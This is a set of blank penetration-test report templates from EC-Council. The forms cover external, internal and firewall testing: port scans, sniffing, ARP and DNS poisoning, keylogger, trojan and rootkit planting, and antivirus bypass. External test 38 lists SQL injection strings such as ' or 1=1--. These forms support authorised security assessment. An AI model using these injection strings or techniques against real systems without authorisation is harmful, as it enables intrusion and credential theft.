
EC-Council Licensed Penetration Tester

Methodology: External Network Penetration Testing

Penetration Tester:
Organization:
Date:
Location:

Confidential 1 Template ENPT/06


EC-Council Licensed Penetration Tester

Test 1: Perform information gathering

Target Organization
URL
List of cities the company is located in
1.
2.
3.
4.
5.

Company's Website Links
1.
2.
3.
4.
5.

World Map of the Cities where the Company Resides

External Resource of the Target's Networks
1.
2.
3.
4.
5.

Confidential 2 Template ENPT/06 Copyright by EC-Council. All Rights Reserved. Reproduction is Strictly Prohibited.

Company's Partner, Board of Directors, Employee Information, and Contact Details
1.
2.
3.
4.
5.

IP Address
1.
2.
3.
4.
5.

Domain Names
1.
2.
3.
4.
5.

Network Range
1.
2.
3.
4.
5.

Other Information Recovered
1.
2.
3.
4.
5.

Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 2: Create topological map of the network

Target Organization
URL
Create Topological Map of the Network:
LAN/WAN Design
Peer-to-Peer (P2P)
Network Topologies
Network Cabling

Customers and Partners Networked to other Systems

Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 3: Locate TCP/UDP traffic path to the destination

Target Organization
URL
TCP Traffic Path to the Destination is located Successfully   Yes   No
IP Address Traced
Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 4: Identify the physical location of the target servers

Target Organization
URL
Physical location of the target Servers
IP Address   City Located   Country   Hosted by Vendor
1.
2.
3.
4.
5.
Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 5: Locate the ISP servicing the client

Target Organization
URL
Name of the ISP
Pricing Plans
1.
2.
3.

Services Provided
1.
2.
3.
4.

Which other companies are assigned IP addresses from the same block
1.
2.
3.
4.

Tools/Services Used
1.
2.
3.
4.

Results Analysis:

Test 6: Examine the use of IPv6 at the remote location

Target Organization
URL
IP Addresses probed for IPv6
1.
2.
3.
4.
5.

List of IP addresses using IPv6
1.
2.
3.
4.
5.

Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 7: Examine the system uptime of target server

Target Organization
URL
Server   OS   Last Seen   IP Address   Uptime   Netblock Owner

Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 8: Examine the patches applied to the target operating system

Target Organization
URL
OS   Server   Last Seen   IP Address   Netblock Owner

Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 9: Check for live systems (ICMP scanning)

Target Organization
URL
Command Used
Performed ICMP Scanning on the Target Successfully   Yes   No
Response Received

Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 10: Port scan every port (65,536) on the target's network

Target Organization
URL
IP Address Tested
Performed Complete Port Scan of the Target Network Successfully   Yes   No
Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 11: List open and closed ports

Target Organization
URL
IP Address Tested
List the Ports that are Open
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.

List the Ports that are Closed
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.

Tools/Services Used
1.
2.
3.
4.

Results Analysis:

Test 12: Use connect scan (Full open scan) on the target and see the response

Target Organization
URL
IP Address Scanned
Command Used
Performed Connect Scan on the Target Successfully   Yes   No
Response Received

Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 13: Use SYN scan (Half-open scan) on the target and see the response

Target Organization
URL
IP Address Scanned
Command Used
Performed SYN Scan on the Target Successfully   Yes   No
Response Received

Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 14: Use XMAS scan on the target and see the response

Target Organization
URL
IP Address Scanned
Command Used
Performed XMAS Scan on the Target Successfully   Yes   No
Response Received

Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 15: Use FIN scan on the target and see the response

Target Organization
URL
IP Address Scanned
Command Used
Performed FIN Scan on the Target Successfully   Yes   No
Response Received

Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 16: Use NULL scan on the target and see the response

Target Organization
URL
IP Address Scanned
Command Used
Performed NULL Scan on the Target Successfully   Yes   No
Response Received

Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 17: Use ACK flag probe scan on the target and see the response

Target Organization
URL
IP Address Scanned
Command Used
Performed ACK flag probe Scan on the Target Successfully   Yes   No
Response Received

Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 18: Use UDP scan on the target and see the response

Target Organization
URL
IP Address Scanned
Command Used
Performed UDP Scan on the Target Successfully   Yes   No
Response Received

Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 19: Use fragmentation scanning and examine the response

Target Organization
URL
IP Address Scanned
Command Used
Performed Fragmentation Scan on the Target Successfully   Yes   No
Response Received

Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 20: OS fingerprint target servers

Target Organization
URL
Target Servers IP Address   Operating System Used
1.
2.
3.
4.
5.
6.
7.
8.
9.
Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 21: Grab the banner of HTTP servers

Target Organization
URL
Captured the Banner of HTTP Server Successfully   Yes   No
Identified HTTP Web Server
Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 22: Grab the banner of SMTP servers

Target Organization
URL
Captured the Banner of SMTP Server Successfully   Yes   No
Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 23: Grab the banner of POP3 servers

Target Organization
URL
Captured the Banner of POP3 Server Successfully   Yes   No
Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 24: Grab the banner of FTP servers

Target Organization
URL
Captured the Banner of FTP Server Successfully   Yes   No
Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 25: Firewalk on the router's gateway and guess the access list

Target Organization
URL
IP Address Firewalked
Response Received
Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 26: Examine TCP sequence number prediction

Target Organization
URL
IP Address Tested
Command Used
Sequence Numbers Predicted
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.

Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 27: Examine IPID sequence number prediction

Target Organization
URL
IP Address Tested
IPID number predicted
1.
2.
3.
4.
5.
6.
7.
8.

Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 28: Examine the use of standard and non-standard protocols

Target Organization
URL
IP Address Tested
Standard Protocols Used
1.
2.
3.
4.
5.

Non-Standard Protocols Used
1.
2.
3.
4.
5.

Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 29: Download applications from the company's website and reverse engineer the binary code

Target Organization
URL
Downloaded Application from URL   Name of the Application   Type of Application
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
Information looked at by Reverse Engineering the Binary Code
1.
2.
3.
4.
5.
6.
7.

Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 30: List the programming languages and application software used to create the programs on the target server

Target Organization
URL
Type of Application   Commercial   In-House
Programming Languages Used by Web Application:
AppleScript
C
AWK
C++
JavaScript
C#
PERL
COBOL
PHP
Java
Python
J++
Ruby
J#
Tcl
PowerBuilder
VBScript
Visual Basic
Others: _________________________
_________________________

Tools/Services Used
1.
2.
3.
4.

Results Analysis:

Test 31: Look for error and custom web pages

Target Organization
URL
List of Tested URL Strings
1.
2.
3.
4.
5.
6.
7.
8.

Error Message Location URLs
1.
2.
3.
4.

Content of the Message

Tools/Services Used
1.
2.
3.
4.

Results Analysis:

Test 32: Guess various subdomain names and analyze responses

Target Organization
URL
Main Domain
List of Sub Domain Names and their Responses
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.

Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 33: Examine the session variables

Target Organization
URL
Website URL tested
Session variable   Value
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 34: Perform various attacks on web applications

Target Organization
URL
Web Application Attack Type:
URL Encoding
Buffer Overflow
Cross Site Scripting (XSS)
Other

URL Encoding
Web Page   URL Encodings   Response Received
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
Tools/Services Used
1.
2.
3.
4.
5.

Buffer Overflow
Web Page   Buffer Overflow Text Attempted   Response Received
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
Tools/Services Used
1.
2.
3.
4.

Cross Site Scripting (XSS)
Vulnerabilities in Web Page Tested   Cross Site Scripting Script Attempted   Response Received
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 35: Check for directory consistency and page naming syntax of the web pages

Target Organization
URL
Web Page URL   Directory Consistency and Page Naming Syntax
1.
   Logical directory
   Files named based on naming conventions
   Repository for images, pdf, and other documents
   Repository for sensitive information
   Structured links and pages
   Site outline
2.
   Logical directory
   Files named based on naming conventions
   Repository for images, pdf, and other documents
   Repository for sensitive information
   Structured links and pages
   Site outline
Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 36: Look for sensitive information in web page source code

Target Organization
URL
Website URL Tested
Source Code Leakage
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.

Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 37: Record and replay the traffic to the target web server and note the response

Target Organization
URL
Website URL
Recorded Browser Sessions
1.
2.
3.
4.
5.

Replay Packet Size

Response Received

Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 38: Perform SQL injection

Target Organization
URL
Website URL Tested
Tested Strings:
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
") or ("a"="a
Attempted Locations:
Form fields
Directly in URL
Login screens
Feedback forms
Guestbook
Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 39: Examine Server Side Includes (SSI)

Target Organization
URL
Web Page   Include Command   Web Server Directory
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 40: Examine e-commerce and payment gateways handled by the web server

Target Organization
URL
In-house built e-commerce gateway
Outsourced e-commerce gateway
Program Logic
How Payments are Handled
Confirmation Emails
Minimum Order Amount
Account and Merchant ID
Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 41: Examine welcome messages, error messages, and debug messages

Target Organization
URL
Web Application Welcome Message
Web Application Error Messages
1.
2.
3.
4.

Web Application Intrusion Warning Messages
1.
2.
3.
4.

Web Application Debugging Messages
1.
2.
3.
4.

Web Application Site Maintenance Messages
1.
2.
3.
4.

Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 42: Probe the service by SMTP mail bouncing

Target Organization
URL
Mail Sent to
SMTP Bounced Back the Mail   Yes   No
Search in the Bounce Mail:
Server Name:
Version:
Services Running on Server:

Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 43: Identify the web extensions used at the server

Target Organization
URL
Web Extensions Discovered
1.
2.
3.
4.
5.

Web Server Type and Version
Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 44: Try to use an HTTPS tunnel to encapsulate traffic

Target Organization
URL
Encapsulated Traffic using HTTPS Tunnel Successfully   Yes   No
Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 45: Port scan DNS servers (TCP/UDP 53)

Target Organization
URL
Command Used
Target System IP Address   Port   State   Service
1.
2.
3.
4.
5.
6.
7.
Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 46: Port scan TFTP servers (Port 69)

Target Organization
URL
Command Used
Target System IP Address   Port   State
1.
2.
3.
4.
5.
6.
7.
Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 47: Test for NTP ports (Port 123)

Target Organization
URL
Command Used
Target System IP Address   Port   State   Service
1.
2.
3.
4.
5.
6.
7.
Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 48: Test for SNMP ports (Port 161)

Target Organization
URL
Command Used
Target System IP Address   Port   State   Service
1.
2.
3.
4.
5.
6.
7.
Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 49: Test for Telnet ports (Port 23)

Target Organization
URL
Command Used
Target System IP Address   Port   State   Service
1.
2.
3.
4.
5.
6.
7.
Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 50: Test for LDAP ports (Port 389)

Target Organization
URL
Command Used
Target System IP Address   Port   LDAP Query   Response
1.
2.
3.
4.
5.
6.
7.
Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 51: Test for NetBIOS ports (Ports 135-139, 445)

Target Organization
URL
Command Used
Target System IP Address   Port   State   Service
1.
2.
3.
4.
5.
6.
7.
Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 52: Test for SQL server ports (Port 1433, 1434)

Target Organization
URL
Command Used
Target System IP Address   Port   State   Service
1.
2.
3.
4.
5.
6.
7.
Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 53: Test for Citrix ports (Port 1495)

Target Organization
URL
Command Used
Target System IP Address   Port   State   Service
1.
2.
3.
4.
5.
6.
7.
Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 54: Test for Oracle ports (Port 1521)

Target Organization
URL
Command Used
Target System IP Address   Port   State   Service
1.
2.
3.
4.
5.
6.
7.
Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 55: Test for NFS ports (Port 2049)

Target Organization
URL
Command Used
Target System IP Address   Port   State   Service
1.
2.
3.
4.
5.
6.
7.
Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 56: Test for Compaq/HP Insight Manager ports (Port 2301, 2381)

Target Organization
URL
Command Used
Target System IP Address   Port   State   Service
1.
2.
3.
4.
5.
6.
7.
Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 57: Test for Remote Desktop ports (Port 3389)

Target Organization
URL
Command Used
Target System IP Address   Port   State   Service
1.
2.
3.
4.
5.
6.
7.
Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 58: Test for Sybase ports (Port 5000)

Target Organization
URL
Command Used
Target System IP Address   Port   State   Service
1.
2.
3.
4.
5.
6.
7.
Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 59: Test for SIP ports (Port 5060)

Target Organization
URL
Command Used
Target System IP Address   Port   State   Service
1.
2.
3.
4.
5.
6.
7.
Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 60: Test for VNC ports (Port 5900/5800)

Target Organization
URL
Command Used
Target System IP Address   Port   State   Service
1.
2.
3.
4.
5.
6.
7.
Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 61: Test for X11 ports (Port 6000)

Target Organization
URL
Command Used
Target System IP Address   Port   State   Service
1.
2.
3.
4.
5.
6.
7.
Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 62: Test for JetDirect ports (Port 9100)

Target Organization
URL
Command Used
Target System IP Address   Port   State   Service
1.
2.
3.
4.
5.
6.
7.
Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 63: Port scan FTP data (Port 20)

Target Organization
URL
Command Used
Target System IP Address   Port   State   Service
1.
2.
3.
4.
5.
6.
7.
Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 64: Port scan web servers (Port 80)

Target Organization
URL
Command Used
Target System IP Address   Port   State   Service
1.
2.
3.
4.
5.
6.
7.
Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 65: Port scan SSL servers (Port 443)

Target Organization
URL
Command Used
Target System IP Address   Port   State   Service
1.
2.
3.
4.
5.
6.
7.
Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 66: Port scan Kerberos-Active Directory (Port TCP/UDP 88)

Target Organization
URL
Command Used
Target System IP Address   Port   State   Service
1.
2.
3.
4.
5.
6.
7.
Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 67: Port scan SSH servers (Port 22)

Target Organization
URL
Command Used
Target System IP Address   Port   State   Service
1.
2.
3.
4.
5.
6.
7.
Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 68: Perform vulnerability scanning

Target Organization
URL
Vulnerability Assessment Timeline
Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

EC-Council Licensed Penetration Tester

Methodology: Internal Network Penetration Testing

Penetration Tester:
Organization:
Date:
Location:

Confidential 1 Template INPT/07


Test 1: Perform information gathering

Target Organization
URL
List of Internal Resources
1.
2.
3.
4.
5.

Company's Partner, Board of Directors, Employee Information, and Contact Details
1.
2.
3.
4.
5.

IP Address
1.
2.
3.
4.
5.

Domain Names
1.
2.
3.
4.
5.

Network Range
1.
2.
3.
4.
5.

ISPs
1.
2.
3.
4.
5.

Other Information Recovered
1.
2.
3.
4.
5.

Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 2: Map the internal network

Target Organization
URL
List the Network Devices Discovered   Make and Model
Hubs
Switches
Servers
Printers
Workstations
Wireless Access Points
Firewalls
Proxy Servers
No. of Client Computers
Others
1. ---------------------------------------
2. ---------------------------------------
3. ---------------------------------------
Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 3: Scan the network for live hosts

Target Organization
URL
Subnet scanned
List the IP Address of live hosts
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.
21.
22.
23.
24.
25.
26.
27.
28.
29.
30.
31.
32.
33.
34.
35.
36.

Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 4: Port-scan the individual machines

Target Organization
URL
IP Address   Machine Name   Ports Open
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.
21.
22.
23.
24.
25.
26.
27.
28.
29.
30.
31.
32.
33.
34.
35.
Tools/Services Used
1.
2.
3.
4.
5.

Results Analysis:

Test 5: Try to gain access using known vulnerabilities

Target Organization
URL
IP Address Tested
Machine Name
Vulnerability Exploited
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.
21.
22.
23.
24.
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 6: Attempt to establish null sessions

Target Organization
URL
IP Address Tested
Machine Name
Is Null Session Attempted Successful? Yes No
If Successful, List the Enumerated Usernames and Other Information Here 1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.
21.
22.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 7: Perform enumeration

Target Organization
URL
IP Address Tested
Machine Name
Enumerating Users, Password Policies, and Group Policies based on the Established Null Session is Successful Yes No
If Successful, List the Information Obtained Here 1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 8: Sniff the network

Target Organization
URL
Is Sniffing the Network Successful? Yes No
Interesting Traffic Traversing on the Network 1.
2.
3.
4.
5.
6.
7.
8.
9.
10.

List the Passwords Sniffed Protocol Username Password
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
List the Email Messages Sniffed 1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 9: Check for ICMP responses from broadcast address

Target Organization
URL
Command Used
Performed ICMP Scanning on the Target Successfully Yes No
Response Received

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 10: Attempt replay attacks

Target Organization
URL
Victim IP Address Targeted
Original Message Captured

Replayed Messages

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 11: Attempt ARP poisoning

Target Organization
URL
Victim IP Address
Poisoned IP Address
Victim MAC Address
Poisoned MAC Address
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 12: Attempt MAC flooding

Target Organization
URL
Is Flooding the Network with Bogus MAC Addresses Successful? Yes No
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 13: Conduct a Man-in-the-Middle attack

Target Organization
URL
Victim Machine
Target Machine
MITM Machine
Intercepted the Communication Channel between the Victim and the Target Successfully? Yes No
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 14: Attempt DNS poisoning

Target Organization
URL
Victim Machine
List the Hosts added into the Cache of a DNS Server to Corrupt the DNS Tables 1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.

Is DNS Poisoning Attempt Successful Yes No
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 15: Try to log into a console machine

Target Organization
URL
Victim Machine
Username
Default Password
Is Logging into a Console Machine Successful? Yes No
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 16: Boot the PC using alternate OS and steal the SAM file

Target Organization
URL
Victim Machine
Username Reset
Password Reset
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 17: Reset the local administrator or other user account passwords

Target Organization
URL
Victim Machine
Username Reset
Password Reset
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 18: Attempt to plant a software keylogger to steal passwords

Target Organization
URL
Victim Machine
Installation of Software Keylogger on the Victim Machine Successful Yes No
Captured Keystrokes 1.
2.
3.
4.
5.
6.
7.
8.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 19: Attempt to plant a hardware keylogger to steal passwords

Target Organization
URL
Victim Machine
Installation of Hardware Keylogger on the Victim Machine Successful Yes No
Captured Keystrokes 1.
2.
3.
4.
5.
6.
7.
8.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 20: Attempt to plant spyware on the target machine

Target Organization
URL
Victim Machine
Installed Spyware on the Victim Machine Successfully Yes No
Information Obtained 1.
2.
3.
4.
5.
6.
7.
8.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 21: Attempt to plant a Trojan on the target machine

Target Organization
URL
Victim Machine
Installed Trojan on the Victim Machine Successfully Yes No
Information Obtained 1.
2.
3.
4.
5.
6.
7.
8.
9.
10.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 22: Attempt to create a backdoor account on the target machine

Target Organization
URL
Victim Machine
Backdoor Account on the Target Machine is Created Successfully Yes No
Backdoor Behavior
Information Obtained 1.
2.
3.
4.
5.
6.
7.
8.
9.
10.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 23: Attempt to bypass antivirus software installed on the target machine

Target Organization
URL
Victim Machine
Anti-Virus Installed on the Victim Machine
Details of the Program Created to Bypass the Anti-Virus Rules 1.
2.
3.
4.

Anti-Virus Evaded Yes No


Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 24: Attempt to send a virus using the target machine

Target Organization
URL
Victim Machine
Type of Virus
Successfully sent Virus via Target Machine to Spread throughout the Network Yes No
Viruses Used 1.
2.
3.
4.
5.

Results Analysis:

Test 25: Attempt to plant rootkits on the target machine

Target Organization
URL
Victim Machine
Type of Rootkit
Installed Rootkit on the target machine Successfully Yes No
Rootkits Used 1.
2.
3.
4.
5.

Results Analysis:

Test 26: Hide sensitive data on target machines

Target Organization
URL
Victim Machine
Steganography Technique used
Sensitive Data Hidden IP addresses
Source code
Pictures
Word documents
Spreadsheets
Hacking Tools
Secret Information
Pornography images
Others
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 27: Hide hacking tools and other data on target machines

Target Organization
URL
Victim Machine
Steganography Technique used
Hacking Tools and other Data Hidden 1.
2.
3.
4.
5.
6.
7.
8.
9.
10.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 28: Use various steganography techniques to hide files on target machines

Target Organization
URL
Victim Machine
Steganography Techniques used 1.
2.
3.
4.
5.

Hidden Data 1.
2.
3.
4.
5.
6.
7.
8.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 29: Escalate user privileges

Target Organization
URL
Victim Machine
Escalated User Privileges Successfully Yes No
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 30: Run Wireshark with the filter ip.src == [ip_address]

Target Organization
URL
Filter Used
Source ip_address
Captured Traffic Successfully Yes No
Description of the Packets Captured Time:
Source:
Destination:
Protocol:
Length:
Info:

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 31: Run Wireshark with the filter ip.dst == [ip_address]

Target Organization
URL
Filter Used
Destination ip_address
Captured Traffic Successfully Yes No
Description of the Packets Captured Time:
Source:
Destination:
Protocol:
Length:
Info:

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 32: Run Wireshark with protocol-based filters

Target Organization
URL
Filter Used
Target IP Address
Captured Traffic Successfully Yes No
Description of the Packets Captured Time:
Source:
Destination:
Protocol:
Length:
Info:

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 33: Run Wireshark with the filter tcp.port == [port_no]

Target Organization
URL
Filter Used
Port Number
Captured Traffic Successfully Yes No
Description of the Packets Captured Time:
Source:
Destination:
Protocol:
Length:
Info:

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 34: Capture POP3 traffic

Target Organization
URL
Filter Used
Captured POP3 Traffic Successfully Yes No
Description of the Packets Captured Time:
Source:
Destination:
Protocol:
Length:
Info:

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 35: Capture SMTP traffic

Target Organization
URL
Filter Used
Captured Incoming and Outgoing SMTP Traffic Successfully Yes No
Description of the Packets Captured Time:
Source:
Destination:
Protocol:
Length:
Info:

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 36: Capture IMAP email traffic

Target Organization
URL
Filter Used
Captured IMAP Email Traffic Successfully Yes No
Description of the Packets Captured Time:
Source:
Destination:
Protocol:
Length:
Info:

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 37: Capture the communications between FTP client and FTP server

Target Organization
URL
Captured the communications between the FTP client and FTP server Successfully Yes No
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 38: Capture HTTP traffic

Target Organization
URL
Filter Used
Captured HTTP Traffic Successfully Yes No
Description of the Packets Captured Time:
Source:
Destination:
Protocol:
Length:
Info:

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 39: Capture HTTPS traffic

Target Organization
URL
Filter Used
Captured HTTPS Traffic Successfully Yes No
Description of the Packets Captured Offset:
Timeline:
Duration:
Method:
Result:
Received:
Type URL:
Redirect URL:
Request Headers Info:
Response Headers Info:
Others:

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 40: Capture RDP traffic

Target Organization
URL
Filter Used
Captured RDP Traffic Successfully Yes No
Description of the Packets Captured Time:
Source:
Destination:
Protocol:
Length:
Info:

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 41: Capture VoIP traffic

Target Organization
URL
Filter Used
Captured VoIP Traffic Successfully Yes No
Description of the Packets Captured Time:
Source:
Destination:
Protocol:
Length:
Info:

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 42: Spoof the MAC address

Target Organization
URL
Victim Machine
Spoofed the MAC Address Successfully Yes No
Spoofed MAC Address
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 43: Poison the victim's IE proxy server

Target Organization
URL
Victim Machine
Poisoned the Victim's IE Proxy Server Successfully Yes No
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 44: Attempt session hijacking on Telnet traffic

Target Organization
URL
Implemented Session Hijacking Technique on Telnet Traffic Successfully Yes No
Telnet Commands 1.
2.
3.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 45: Attempt session hijacking on FTP traffic

Target Organization
URL
Implemented Session Hijacking Technique on FTP Traffic Successfully Yes No
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 46: Attempt session hijacking on HTTP traffic

Target Organization
URL
Implemented Session Hijacking Technique on HTTP Traffic Successfully Yes No
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

EC-Council Licensed Penetration
Tester

Methodology: Firewall Penetration Testing

Penetration Tester:
Organization:
Date: Location:

Confidential 1 Template FPT/08

Test 1: Find information about the target

Target Organization
URL
Information
Available

Company's Name
Server
Topographic Information
Target IP Address

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 2: Perform WHOIS lookup and locate the network range

Target Organization
URL
Domain Name
Domain Name Servers
IP Address
IP Location
ASN
NetRange
CIDR
Handle
Parent
Net Type
RESTful Link
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 3: Perform port scanning

Target Organization
URL
Open Ports
7 Echo
13 DayTime
17 Quote of the Day (QOTD)
20 and 21 File Transfer Protocol (FTP)
22 Secure Socket Shell (SSH)
23 Telnet
25 SMTP
53 Domain Name System (DNS)
63 Whois
66 SQL*net (Oracle)
70 Gopher
79 Finger
80 HTTP
88 Kerberos
101 Host Name Server
109 Post Office Protocol 2 (POP2)
110 Post Office Protocol 3 (POP3)
113 IDENT
115 Simple File Transfer Protocol (SFTP)
137, 138, and 139 NetBIOS
143 Internet Message Access Protocol (IMAP)
161 and 162 Simple Network Management Protocol (SNMP)
194 Internet Relay Chat (IRC)
443 HTTPS
Other Ports:
Tools/Services Used 1.
2.
3.
4.

Results Analysis:

Test 4: Locate the firewall using packet crafter

Target Organization
URL
Firewall Location
Firewall IP Address
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 5: Locate the firewall by conducting traceroute

Target Organization
URL
Firewall Location
Firewall IP Address
Network Topology
Routers
Filtering Devices
Protocols Allowed
Protocols Denied

IP Addresses Hopped
1.
2.
3.
4.
5.
6.
7.
8.
